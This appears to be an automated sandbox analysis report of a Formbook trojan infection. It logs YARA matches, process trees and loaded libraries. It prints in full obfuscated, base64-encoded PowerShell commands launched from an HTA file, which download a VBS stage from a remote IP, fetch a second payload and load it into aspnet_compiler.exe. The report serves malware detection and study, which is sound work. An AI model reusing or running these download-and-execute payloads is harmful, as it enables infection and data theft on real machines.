Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 015F5130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 015AB970 appears 271 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 0162EA12 appears 86 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.1651008436.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.1650098652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3520, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.phis.troj.expl.evad.winHTA@17/16@1/2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\seethebestmagicalthignsgivegoodforu[1].tiff

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7020:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_svm3ycn4.xww.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\seemebestthingsgivenmegood.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE7FE.tmp" "c:\Users\user\AppData\Local\Temp\rll3hpdk\CSC65BF9AAB75645B3826CB5BF8CE44730.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE7FE.tmp" "c:\Users\user\AppData\Local\Temp\rll3hpdk\CSC65BF9AAB75645B3826CB5BF8CE44730.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
